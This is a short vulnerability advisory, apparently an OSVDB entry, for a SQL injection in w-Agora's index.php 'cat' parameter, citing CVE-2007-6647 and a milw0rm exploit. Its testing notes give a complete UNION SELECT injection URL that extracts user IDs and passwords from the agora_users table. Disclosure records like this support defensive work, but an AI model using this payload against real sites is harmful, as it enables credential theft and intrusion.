w-Agora index.php cat Variable SQL Injection

2007-12-30T00:00:00
ID OSVDB:39883
Type osvdb
Reporter OSVDB
Modified 2007-12-30T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/index.php?site=[site_name]&cat=-1//UNION//ALL//SELECT//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24//FROM//agora_users/*

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4817
CVE-2007-6647